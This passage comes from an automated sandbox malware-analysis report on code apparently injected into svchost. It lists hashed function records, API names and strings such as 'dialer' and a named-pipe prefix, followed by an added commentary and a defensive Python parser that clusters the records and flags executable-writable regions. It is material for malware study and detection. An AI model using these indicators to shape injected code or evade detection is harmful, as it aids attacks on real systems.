                                                                          • Instruction Fuzzy Hash: 09217932614B4483FB118BA5F4647AA73E2F789BA5F544215EA5953FA8CF3CC14ACB00

                                                                          Control-flow Graph

                                                                          • Executed
                                                                          • Not Executed
                                                                          control_flow_graph 590 195dd5ca544-195dd5ca5ac call 195dd5cb414 593 195dd5ca5b2-195dd5ca5b5 590->593 594 195dd5caa13-195dd5caa1b call 195dd5cc748 590->594 593->594 595 195dd5ca5bb-195dd5ca5c1 593->595 597 195dd5ca690-195dd5ca6a2 595->597 598 195dd5ca5c7-195dd5ca5cb 595->598 600 195dd5ca963-195dd5ca967 597->600 601 195dd5ca6a8-195dd5ca6ac 597->601 598->597 602 195dd5ca5d1-195dd5ca5dc 598->602 605 195dd5ca9a0-195dd5ca9aa call 195dd5c9634 600->605 606 195dd5ca969-195dd5ca970 600->606 601->600 603 195dd5ca6b2-195dd5ca6bd 601->603 602->597 604 195dd5ca5e2-195dd5ca5e7 602->604 603->600 607 195dd5ca6c3-195dd5ca6ca 603->607 604->597 608 195dd5ca5ed-195dd5ca5f7 call 195dd5c9634 604->608 605->594 619 195dd5ca9ac-195dd5ca9cb call 195dd5c7940 605->619 606->594 609 195dd5ca976-195dd5ca99b call 195dd5caa1c 606->609 611 195dd5ca894-195dd5ca8a0 607->611 612 195dd5ca6d0-195dd5ca707 call 195dd5c9a10 607->612 608->619 623 195dd5ca5fd-195dd5ca628 call 195dd5c9634 * 2 call 195dd5c9d24 608->623 609->605 611->605 616 195dd5ca8a6-195dd5ca8aa 611->616 612->611 628 195dd5ca70d-195dd5ca715 612->628 620 195dd5ca8ba-195dd5ca8c2 616->620 621 195dd5ca8ac-195dd5ca8b8 call 195dd5c9ce4 616->621 620->605 627 195dd5ca8c8-195dd5ca8d5 call 195dd5c98b4 620->627 621->620 634 195dd5ca8db-195dd5ca8e3 621->634 659 195dd5ca62a-195dd5ca62e 623->659 660 195dd5ca648-195dd5ca652 call 195dd5c9634 623->660 627->605 627->634 632 195dd5ca719-195dd5ca74b 628->632 636 195dd5ca751-195dd5ca75c 632->636 637 195dd5ca887-195dd5ca88e 632->637 639 195dd5ca8e9-195dd5ca8ed 634->639 640 195dd5ca9f6-195dd5caa12 call 195dd5c9634 * 2 call 195dd5cc6a8 634->640 636->637 641 195dd5ca762-195dd5ca77b 636->641 637->611 637->632 643 195dd5ca8ef-195dd5ca8fe call 195dd5c9ce4 639->643 644 195dd5ca900 639->644 640->594 645 195dd5ca781-195dd5ca7c6 call 195dd5c9cf8 * 2 641->645 646 195dd5ca874-195dd5ca879 641->646 654 195dd5ca903-195dd5ca90d call 195dd5cb4ac 643->654 644->654 671 195dd5ca804-195dd5ca80a 645->671 672 195dd5ca7c8-195dd5ca7ee call 195dd5c9cf8 call 195dd5cac38 645->672 651 195dd5ca884 646->651 651->637 654->605 668 195dd5ca913-195dd5ca961 call 195dd5c9944 call 195dd5c9b50 654->668 659->660 665 195dd5ca630-195dd5ca63b 659->665 660->597 675 195dd5ca654-195dd5ca674 call 195dd5c9634 * 2 call 195dd5cb4ac 660->675 665->660 667 195dd5ca63d-195dd5ca642 665->667 667->594 667->660 668->605 679 195dd5ca87b 671->679 680 195dd5ca80c-195dd5ca810 671->680 690 195dd5ca7f0-195dd5ca802 672->690 691 195dd5ca815-195dd5ca872 call 195dd5ca470 672->691 696 195dd5ca68b 675->696 697 195dd5ca676-195dd5ca680 call 195dd5cb59c 675->697 684 195dd5ca880 679->684 680->645 684->651 690->671 690->672 691->684 696->597 700 195dd5ca9f0-195dd5ca9f5 call 195dd5cc6a8 697->700 701 195dd5ca686-195dd5ca9ef call 195dd5c92ac call 195dd5caff4 call 195dd5c94a0 697->701 700->640 701->700
                                                                          APIs
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000020.00000002.3592825778.00000195DD5C0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000195DD5C0000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_32_2_195dd5c0000_svchost.jbxd
                                                                          Similarity
                                                                          • API ID: BlockFrameHandler3::Unwind$CatchExecutionHandlerIs_bad_exception_allowedSearchStatestd::bad_alloc::bad_alloc
                                                                          • String ID: csm$csm$csm
                                                                          • API String ID: 849930591-393685449
                                                                          • Opcode ID: ff241bfc108c8e41cf32293f5c139143a9d96e7d242899cc36c30a4197855322
                                                                          • Instruction ID: 9c2520efcc87ac771d522e1eb6396a81ecb0ce0daac719ccbdf896b70f129e44
                                                                          • Opcode Fuzzy Hash: ff241bfc108c8e41cf32293f5c139143a9d96e7d242899cc36c30a4197855322
                                                                          • Instruction Fuzzy Hash: 07E18D72606B488AEB32DFA9D4913DD7BE2F745B98F100115EE89A7F99CB35C481CB00

                                                                          Control-flow Graph (rendered graph not reproduced here; legend: Executed / Not Executed)
                                                                          • Entry block: 195dd599944-195dd5999ac, calling 195dd59a814; the graph covers roughly 70 basic blocks of this function with further calls into 195dd59bb48, 195dd598a34, 195dd596d40, 195dd599e1c, 195dd598e10, 195dd5990e4, 195dd598cb4, 195dd5990f8, 195dd59baa8, 195dd59a038, 195dd59a8ac, 195dd598d44, 195dd598f50, 195dd599870, 195dd59a99c, 195dd5986ac, 195dd59a3f4 and 195dd5988a0
                                                                          APIs
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000020.00000002.3592258832.00000195DD590000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000195DD590000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_32_2_195dd590000_svchost.jbxd
                                                                          Similarity
                                                                          • API ID: BlockFrameHandler3::Unwind$CatchExecutionHandlerIs_bad_exception_allowedSearchStatestd::bad_alloc::bad_alloc
                                                                          • String ID: csm$csm$csm
                                                                          • API String ID: 849930591-393685449
                                                                          • Opcode ID: 65b39982983e806640910362ba4e105e6dc551b6220b15538d356c191c28ac3a
                                                                          • Instruction ID: 8578d22811c705561b9a0c63265d0fa22d72dfafe6aec0b6b4f758a2598a20e0
                                                                          • Opcode Fuzzy Hash: 65b39982983e806640910362ba4e105e6dc551b6220b15538d356c191c28ac3a
                                                                          • Instruction Fuzzy Hash: 3EE18C72604B40CAEB62DBA5D4A03DD7BE2F756B98F142116EE8967F99CB34C191CF00

                                                                          Control-flow Graph

                                                                          APIs
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000020.00000002.3592825778.00000195DD5C0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000195DD5C0000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_32_2_195dd5c0000_svchost.jbxd
                                                                          Similarity
                                                                          • API ID: AddressFreeLibraryProc
                                                                          • String ID: api-ms-$ext-ms-
                                                                          • API String ID: 3013587201-537541572
                                                                          • Opcode ID: ec1e5874304155dc1a340afb949db992b9dfa589f06c8a0471ec677ed5d909ab
                                                                          • Instruction ID: f94411bdc3c5adc3673d068f26baf74004ea3de06b1d5fa0a00e338998d396b5
                                                                          • Opcode Fuzzy Hash: ec1e5874304155dc1a340afb949db992b9dfa589f06c8a0471ec677ed5d909ab
                                                                          • Instruction Fuzzy Hash: 4741B236313E0492EB17DB9AA8647D623E7BB45BA0F494125DD0AE7F84EE3CC44A8350

                                                                          Control-flow Graph

                                                                          APIs
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000020.00000002.3592825778.00000195DD5C0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000195DD5C0000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_32_2_195dd5c0000_svchost.jbxd
                                                                          Similarity
                                                                          • API ID: Heap$Process$AllocEnumFreeInfoQueryValue
                                                                          • String ID: d
                                                                          • API String ID: 3743429067-2564639436
                                                                          • Opcode ID: 4e806da6bf888755fbf7915dbe23be07e0600cef0dd9ac19d63751155720d402
                                                                          • Instruction ID: 85125c25dfd785958ae00b37ce84ac9a8513cd9fd1755175fa0b0cf5bc826ac5
                                                                          • Opcode Fuzzy Hash: 4e806da6bf888755fbf7915dbe23be07e0600cef0dd9ac19d63751155720d402
                                                                          • Instruction Fuzzy Hash: CC418C33214F88C6E761CFA5E45479A77E2F389B89F048129DA8957B58DF3CC489CB00
                                                                          APIs
                                                                          • FlsGetValue.KERNEL32(?,?,?,00000195DD5CC7DE,?,?,?,?,?,?,?,?,00000195DD5CCF9D,?,?,00000001), ref: 00000195DD5CD087
                                                                          • FlsSetValue.KERNEL32(?,?,?,00000195DD5CC7DE,?,?,?,?,?,?,?,?,00000195DD5CCF9D,?,?,00000001), ref: 00000195DD5CD0A6
                                                                          • FlsSetValue.KERNEL32(?,?,?,00000195DD5CC7DE,?,?,?,?,?,?,?,?,00000195DD5CCF9D,?,?,00000001), ref: 00000195DD5CD0CE
                                                                          • FlsSetValue.KERNEL32(?,?,?,00000195DD5CC7DE,?,?,?,?,?,?,?,?,00000195DD5CCF9D,?,?,00000001), ref: 00000195DD5CD0DF
                                                                          • FlsSetValue.KERNEL32(?,?,?,00000195DD5CC7DE,?,?,?,?,?,?,?,?,00000195DD5CCF9D,?,?,00000001), ref: 00000195DD5CD0F0
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000020.00000002.3592825778.00000195DD5C0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000195DD5C0000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_32_2_195dd5c0000_svchost.jbxd
                                                                          Similarity
                                                                          • API ID: Value
                                                                          • String ID: 1%$Y%
                                                                          • API String ID: 3702945584-1395475152
                                                                          • Opcode ID: eaed261e9eff258ccad1ac5f7a99306e4284ed666e6615725d2dc279c7a103a4
                                                                          • Instruction ID: b29a2c01b9a529d3d397189201e4ebb9e472c9377beb16884566e216c47c93f0
                                                                          • Opcode Fuzzy Hash: eaed261e9eff258ccad1ac5f7a99306e4284ed666e6615725d2dc279c7a103a4
                                                                          • Instruction Fuzzy Hash: 47112134707A8881FB6A67AF59717E963C35B847F0F1443269839F6EDAEE28C5428700
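The entries above are machine-generated per-function records, and the useful signal sits in the cross-references between them: the two BlockFrameHandler3::Unwind routines in the 0x195DD5C0000 and 0x195DD590000 dumps carry the same API String ID 849930591-393685449 with different Opcode IDs, i.e. the same CRT exception-handling routine recovered from two separate executable regions in svchost (PID 32), which is consistent with the injection signatures in the report header. The Python below is an added example, not part of the Joe Sandbox report, that parses this listing format from a constructed sample re-typed from the entries above, clusters functions by API String ID, lists the imports each function resolves, and flags dumps taken from PAGE_EXECUTE_READWRITE (0x40) regions. The .sdmp file-name layout it assumes (PID in hex, stage, id, base address, page protection, ...) is an assumption that matches the snapshot name hcaresult_32_2_195dd5c0000_svchost.jbxd, not documented Joe Sandbox behaviour; the helper names are likewise made up for this example.

```python
"""Parse Joe Sandbox per-function entries and cluster them by region and ID.

Added example, not part of the report above. Assumes the entry layout shown
on the page and an .sdmp name layout of <pid hex>.<stage>.<id>.<base>.<prot>.
"""
import re
from collections import defaultdict

PAGE_EXECUTE_READWRITE = 0x40  # Win32 memory protection constant

# Constructed sample: three entries re-typed from the report above, trimmed
# to the bullets the parser uses (bullet marker and field names kept as-is).
SAMPLE = """\
APIs
Memory Dump Source
• Source File: 00000020.00000002.3592825778.00000195DD5C0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000195DD5C0000, based on PE: true
• Snapshot File: hcaresult_32_2_195dd5c0000_svchost.jbxd
Similarity
• API ID: BlockFrameHandler3::Unwind$CatchExecutionHandlerIs_bad_exception_allowedSearchStatestd::bad_alloc::bad_alloc
• String ID: csm$csm$csm
• API String ID: 849930591-393685449
• Opcode ID: ff241bfc108c8e41cf32293f5c139143a9d96e7d242899cc36c30a4197855322
APIs
Memory Dump Source
• Source File: 00000020.00000002.3592258832.00000195DD590000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000195DD590000, based on PE: true
• Snapshot File: hcaresult_32_2_195dd590000_svchost.jbxd
Similarity
• API ID: BlockFrameHandler3::Unwind$CatchExecutionHandlerIs_bad_exception_allowedSearchStatestd::bad_alloc::bad_alloc
• String ID: csm$csm$csm
• API String ID: 849930591-393685449
• Opcode ID: 65b39982983e806640910362ba4e105e6dc551b6220b15538d356c191c28ac3a
APIs
• FlsGetValue.KERNEL32(?,?,?,00000195DD5CC7DE,?,?,?,?,?,?,?,?,00000195DD5CCF9D,?,?,00000001), ref: 00000195DD5CD087
• FlsSetValue.KERNEL32(?,?,?,00000195DD5CC7DE,?,?,?,?,?,?,?,?,00000195DD5CCF9D,?,?,00000001), ref: 00000195DD5CD0A6
Memory Dump Source
• Source File: 00000020.00000002.3592825778.00000195DD5C0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000195DD5C0000, based on PE: true
• Snapshot File: hcaresult_32_2_195dd5c0000_svchost.jbxd
Similarity
• API ID: Value
• String ID: 1%$Y%
• API String ID: 3702945584-1395475152
• Opcode ID: eaed261e9eff258ccad1ac5f7a99306e4284ed666e6615725d2dc279c7a103a4
"""

API_CALL = re.compile(r"^• (\w+)\.(\w+)\((.*)\), ref: ([0-9A-Fa-f]+)$")
SOURCE = re.compile(r"^• Source File: (\S+?), Offset: ([0-9A-Fa-f]+)")
FIELD = re.compile(r"^• ([^:]+): (.*)$")


def parse_entries(text):
    """Split the listing at each 'APIs' header; one function record per chunk."""
    entries, cur = [], None
    for line in text.splitlines():
        line = line.strip()
        if line == "APIs":
            cur = {"apis": [], "fields": {}}
            entries.append(cur)
            continue
        if cur is None or not line.startswith("•"):
            continue
        m = API_CALL.match(line)
        if m:  # (api name, module, call-site address)
            cur["apis"].append((m.group(1), m.group(2), m.group(4)))
            continue
        m = SOURCE.match(line)
        if m:  # assumed .sdmp name layout, see module docstring
            parts = m.group(1).split(".")
            cur["pid"] = int(parts[0], 16)
            cur["base"] = int(parts[3], 16)
            cur["protection"] = int(parts[4], 16)
            continue
        m = FIELD.match(line)
        if m:
            cur["fields"][m.group(1)] = m.group(2)
    return entries


def group_by_api_string_id(entries):
    """Same API String ID in different dumps: the same routine recovered from
    several injected regions. Returns id -> [(base, Opcode ID), ...]."""
    groups = defaultdict(list)
    for e in entries:
        key = e["fields"].get("API String ID")
        if key:
            groups[key].append((e["base"], e["fields"].get("Opcode ID")))
    return dict(groups)


def rwx_regions(entries):
    """(pid, base) of every dump taken from a PAGE_EXECUTE_READWRITE region."""
    return sorted({(e["pid"], e["base"]) for e in entries
                   if e.get("protection") == PAGE_EXECUTE_READWRITE})


def apis_by_module(entries):
    """Count resolved imports as MODULE!Name across all parsed functions."""
    counts = defaultdict(int)
    for e in entries:
        for name, module, _ref in e["apis"]:
            counts[f"{module}!{name}"] += 1
    return dict(counts)


if __name__ == "__main__":
    parsed = parse_entries(SAMPLE)
    for sid, members in group_by_api_string_id(parsed).items():
        print(sid, [hex(b) for b, _ in members])
    print("RWX regions:", [(p, hex(b)) for p, b in rwx_regions(parsed)])
    print("imports:", apis_by_module(parsed))
```

Running this over a full report export rather than the three-entry sample is the practical use: clustering by API String ID shows which CRT and loader routines appear in every injected region (noise to skip), leaving the region-specific functions (the stratum, pipe and hook code the header signatures refer to) for manual review, and the RWX list gives the exact (PID, base) pairs to pull from the sandbox dumps.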
                                                                          APIs
                                                                          Memory Dump Source
                                                                          • Source File: 00000020.00000002.3592825778.00000195DD5C0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000195DD5C0000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_32_2_195dd5c0000_svchost.jbxd
                                                                          Similarity
                                                                          • API ID: Initialize__scrt_acquire_startup_lock__scrt_dllmain_after_initialize_c__scrt_dllmain_crt_thread_attach__scrt_release_startup_lock
                                                                          • String ID:
                                                                          • API String ID: 190073905-0
                                                                          • Opcode ID: 0257f947f8d22f27d89668d16c5c48cc6f3519c7a2ac610662f1932688afbc32
                                                                          • Instruction ID: db17aeae78a532267f4925ec03955f9628ff8aa19b2b3ce37216714fce8ee9dc
                                                                          • Opcode Fuzzy Hash: 0257f947f8d22f27d89668d16c5c48cc6f3519c7a2ac610662f1932688afbc32
                                                                          • Instruction Fuzzy Hash: 7281A031602E0F86FB63ABEE98713D967D3AB45780F145415DA05F7F96EB78C8868700
                                                                          APIs
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000020.00000002.3592825778.00000195DD5C0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000195DD5C0000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_32_2_195dd5c0000_svchost.jbxd
                                                                          Similarity
                                                                          • API ID: Library$Load$AddressErrorFreeLastProc
                                                                          • String ID: api-ms-
                                                                          • API String ID: 2559590344-2084034818
                                                                          • Opcode ID: 9d3cf39bc7784cd844787513709c7d04fd8390ef6f847f410b46324ceba80f6d
                                                                          • Instruction ID: 8d15efdb5329dbd6f8d908350e729aaeb4b7b6a33fa5c2f06519c4c6539ee195
                                                                          • Opcode Fuzzy Hash: 9d3cf39bc7784cd844787513709c7d04fd8390ef6f847f410b46324ceba80f6d
                                                                          • Instruction Fuzzy Hash: 0E31E531213E04D1EF13DBCAA4207D523D6B759BA1F590625DD1EABB98EF38C245C710
                                                                          APIs
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000020.00000002.3592825778.00000195DD5C0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000195DD5C0000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_32_2_195dd5c0000_svchost.jbxd
                                                                          Similarity
                                                                          • API ID: ConsoleWrite$CloseCreateErrorFileHandleLast
                                                                          • String ID: CONOUT$
                                                                          • API String ID: 3230265001-3130406586
                                                                          • Opcode ID: ea8503a65e9befc0d33d9332805196394b6329e0df61646a9863ad39bb9ae76f
                                                                          • Instruction ID: 900ef7d4bcd6fd2864e51168dc1007f1dfbbe5e213ae5e9ff28ad5abe65b03b1
                                                                          • Opcode Fuzzy Hash: ea8503a65e9befc0d33d9332805196394b6329e0df61646a9863ad39bb9ae76f
                                                                          • Instruction Fuzzy Hash: 2C11BF32310F4086E7629B96E8643A9B3E1F788FE5F044224EA1A97B94CF78C8058750
                                                                          APIs
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000020.00000002.3592825778.00000195DD5C0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000195DD5C0000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_32_2_195dd5c0000_svchost.jbxd
                                                                          Similarity
                                                                          • API ID: CurrentProcessProtectVirtual$HandleModule
                                                                          • String ID: wr
                                                                          • API String ID: 1092925422-2678910430
                                                                          • Opcode ID: d5ed198cecc284837a9554765ab7ffb778fa62629811cf0fe5ebc999f83bf42b
                                                                          • Instruction ID: 42188e63fbb78b0732cb93c59acbf515d5b68af2c84de3977fd9872ca41c66e2
                                                                          • Opcode Fuzzy Hash: d5ed198cecc284837a9554765ab7ffb778fa62629811cf0fe5ebc999f83bf42b
                                                                          • Instruction Fuzzy Hash: 38118E36302F4982FF559B95F4242A963F2F749B85F040028DE8953B94EF3DC545C714
                                                                          APIs
                                                                          Memory Dump Source
                                                                          • Source File: 00000020.00000002.3592825778.00000195DD5C0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000195DD5C0000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_32_2_195dd5c0000_svchost.jbxd
                                                                          Similarity
                                                                          • API ID: Thread$Current$Context
                                                                          • String ID:
                                                                          • API String ID: 1666949209-0
                                                                          • Opcode ID: 542e600666cb1ac52823d1f72aa5ca11f47e3ee1f4dc73a6c07a176fbafbfe1c
                                                                          • Instruction ID: 195e277db55ff97f3f99f451c10649e3fcd3ec1e2be31b8428dbef89db2187c3
                                                                          • Opcode Fuzzy Hash: 542e600666cb1ac52823d1f72aa5ca11f47e3ee1f4dc73a6c07a176fbafbfe1c
                                                                          • Instruction Fuzzy Hash: 12D17876205F8882DB71DB9AE4A439A77E1F388B84F500116EA8E97FA5DF3CC551CB40
                                                                          APIs
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000020.00000002.3592825778.00000195DD5C0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000195DD5C0000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_32_2_195dd5c0000_svchost.jbxd
                                                                          Similarity
                                                                          • API ID: Heap$Process$AllocFree
                                                                          • String ID: dialer
                                                                          • API String ID: 756756679-3528709123
                                                                          • Opcode ID: 2e24de9146afbba5105044d4fd5602f1f9f0ed558a5ed62472976580c3eaf0ad
                                                                          • Instruction ID: fc4c9099da629ec678108cb9cb41e40dfa530a30d66993f12becd6c4ba3f9dba
                                                                          • Opcode Fuzzy Hash: 2e24de9146afbba5105044d4fd5602f1f9f0ed558a5ed62472976580c3eaf0ad
                                                                          • Instruction Fuzzy Hash: 0C317036702F5DC2E716DF9AE561BA977E2FB44B84F084020DE48A7F55EB34C4A18740
                                                                          APIs
                                                                          Memory Dump Source
                                                                          • Source File: 00000020.00000002.3592825778.00000195DD5C0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000195DD5C0000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_32_2_195dd5c0000_svchost.jbxd
                                                                          Similarity
                                                                          • API ID: Value$ErrorLast
                                                                          • String ID:
                                                                          • API String ID: 2506987500-0
                                                                          • Opcode ID: 4f148fb448054b99fdb5313590ff83f86fc6d8762bc770a772f95ba4b575ef67
                                                                          • Instruction ID: 8fdc15ff09e63732eb275527d3260f2eb5a265f6af426b64fb26ff3aadc1099c
                                                                          • Opcode Fuzzy Hash: 4f148fb448054b99fdb5313590ff83f86fc6d8762bc770a772f95ba4b575ef67
                                                                          • Instruction Fuzzy Hash: C9115E34203E4882FB66A7AE59757B963C39B847B4F144725A836F6FD6EE6884428700
                                                                          APIs
                                                                          Memory Dump Source
                                                                          • Source File: 00000020.00000002.3592825778.00000195DD5C0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000195DD5C0000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_32_2_195dd5c0000_svchost.jbxd
                                                                          Similarity
                                                                          • API ID: FileName$CloseFindHandleModuleOpenPathProcesslstrlen
                                                                          • String ID:
                                                                          • API String ID: 517849248-0
                                                                          • Opcode ID: 01214db588610ff501214a343c1506f8e4016efad0e64bbd234dc336c45f59d3
                                                                          • Instruction ID: 094941dede99f9d048632fe007c60956db5d273133d38dce1c9db68577c35704
                                                                          • Opcode Fuzzy Hash: 01214db588610ff501214a343c1506f8e4016efad0e64bbd234dc336c45f59d3
                                                                          • Instruction Fuzzy Hash: F4018C31300E4882EB11DB92A86879963E2F788FC1F884035DE4DA3B54DF3CC98AC750
                                                                          APIs
                                                                          Memory Dump Source
                                                                          • Source File: 00000020.00000002.3592825778.00000195DD5C0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000195DD5C0000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_32_2_195dd5c0000_svchost.jbxd
                                                                          Similarity
                                                                          • API ID: CurrentProcessProtectVirtual$HandleModuleTerminateThread
                                                                          • String ID:
                                                                          • API String ID: 449555515-0
                                                                          • Opcode ID: 4c9ec6165d8c5af47ee19c29b3e549fd6cc17b885c385019f049dc0dac4977bc
                                                                          • Instruction ID: a4c37ed03e2153ec921c4fe35d3b930d694565bbf9533148a8bdd7b871a42841
                                                                          • Opcode Fuzzy Hash: 4c9ec6165d8c5af47ee19c29b3e549fd6cc17b885c385019f049dc0dac4977bc
                                                                          • Instruction Fuzzy Hash: 00014075312F4882FF269BA6E82879573E2BB45B86F040424CE4967B54EF3DC149C710
                                                                          APIs
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000020.00000002.3592825778.00000195DD5C0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000195DD5C0000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_32_2_195dd5c0000_svchost.jbxd
                                                                          Similarity
                                                                          • API ID: CurrentImageNonwritableUnwind__except_validate_context_record
                                                                          • String ID: csm$f
                                                                          • API String ID: 2395640692-629598281
                                                                          • Opcode ID: 23eacf76fefb4f7f9308e1222479b694a5ecefb866da3529da442ff7070fa44f
                                                                          • Instruction ID: b6a9a57366d7e32ba7d8204e1a09c4ae5b67336b6113bd5d1bf03962d45849d0
                                                                          • Opcode Fuzzy Hash: 23eacf76fefb4f7f9308e1222479b694a5ecefb866da3529da442ff7070fa44f
                                                                          • Instruction Fuzzy Hash: FD51E732703A088AEB16CF59E469BD837D7F34AB89F518124DA06A3B8CDB75C841CB44
                                                                          APIs
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000020.00000002.3592825778.00000195DD5C0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000195DD5C0000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_32_2_195dd5c0000_svchost.jbxd
                                                                          Similarity
                                                                          • API ID: CurrentImageNonwritableUnwind__except_validate_context_record
                                                                          • String ID: csm$f
                                                                          • API String ID: 2395640692-629598281
                                                                          • Opcode ID: 0036035fc280b7a5a111a049c7edfc77b7be6b9ab52e14187ebc45e366edaa55
                                                                          • Instruction ID: 3343c703fad3ff3a8a0055ce76d4c8b5bb2113134d4bfc35ff936db91a6087cf
                                                                          • Opcode Fuzzy Hash: 0036035fc280b7a5a111a049c7edfc77b7be6b9ab52e14187ebc45e366edaa55
                                                                          • Instruction Fuzzy Hash: 3931D132202A44C6E716DF5AE86879937E6F745BCAF058014EE46A7B8DDB39C941CB04
                                                                          APIs
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000020.00000002.3592825778.00000195DD5C0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000195DD5C0000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_32_2_195dd5c0000_svchost.jbxd
                                                                          Similarity
                                                                          • API ID: FinalHandleNamePathlstrlen
                                                                          • String ID: \\?\
                                                                          • API String ID: 2719912262-4282027825
                                                                          • Opcode ID: c1daab9146f2a1614ef605d22fd4f721266e20aa8a0235322e79b2424596649d
                                                                          • Instruction ID: df346fd54c246db8dc1c541bbdd1f0d6174768352badab0d676f886130502b32
                                                                          • Opcode Fuzzy Hash: c1daab9146f2a1614ef605d22fd4f721266e20aa8a0235322e79b2424596649d
                                                                          • Instruction Fuzzy Hash: 2BF04432304A4592E7618BA5F8A479967E2F748BD8F844021DA4957E54DF3CC64ECB10
                                                                          APIs
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000020.00000002.3592825778.00000195DD5C0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000195DD5C0000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_32_2_195dd5c0000_svchost.jbxd
                                                                          Similarity
                                                                          • API ID: CombinePath
                                                                          • String ID: \\.\pipe\
                                                                          • API String ID: 3422762182-91387939
                                                                          • Opcode ID: 8c685e1f0b85bfe06f91eeefbd03c12bff8419d51c8b157116edbf6ca1c9c829
                                                                          • Instruction ID: 9bf27a7e66860d5ed9a1e4fc62765c01fea6d54f0cf7a99623ebd25812deed3f
                                                                          • Opcode Fuzzy Hash: 8c685e1f0b85bfe06f91eeefbd03c12bff8419d51c8b157116edbf6ca1c9c829
                                                                          • Instruction Fuzzy Hash: FFF01C75715F8882FB158F97B92419967E2AB48FD1F089131EE4A67F28DF3CC4868710
                                                                          APIs
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000020.00000002.3592825778.00000195DD5C0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000195DD5C0000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_32_2_195dd5c0000_svchost.jbxd
                                                                          Similarity
                                                                          • API ID: AddressFreeHandleLibraryModuleProc
                                                                          • String ID: CorExitProcess$mscoree.dll
                                                                          • API String ID: 4061214504-1276376045
                                                                          • Opcode ID: 0f45d19500fbd6816ab24c8a126c5dacde8056cea587c59ff890217df17fdf5d
                                                                          • Instruction ID: 6fff49532d995f645c10438cf692a88e56ff7661239a114b43dcc12d8e254882
                                                                          • Opcode Fuzzy Hash: 0f45d19500fbd6816ab24c8a126c5dacde8056cea587c59ff890217df17fdf5d
                                                                          • Instruction Fuzzy Hash: 9BF09675311F0981EF118BA8E46439963E2EB857A1F540219CA6A56BE4DF3CC546C310
                                                                          APIs
                                                                          Memory Dump Source
                                                                          • Source File: 00000020.00000002.3592825778.00000195DD5C0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000195DD5C0000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_32_2_195dd5c0000_svchost.jbxd
                                                                          Similarity
                                                                          • API ID: CurrentThread
                                                                          • String ID:
                                                                          • API String ID: 2882836952-0
                                                                          • Opcode ID: e13ad259af2044a9722e5c88be2fea28068701e2040856c8b7ebe2328a6e9181
                                                                          • Instruction ID: a3c0edd0877988b553c5cb3f44ac1cf59b63286ea202ec1d8159712ba189bc8b
                                                                          • Opcode Fuzzy Hash: e13ad259af2044a9722e5c88be2fea28068701e2040856c8b7ebe2328a6e9181
                                                                          • Instruction Fuzzy Hash: 7402A83221AB8486E761CB99E4A479EB7E1F3C4794F104115EA8E97FA9DF7CC484CB00
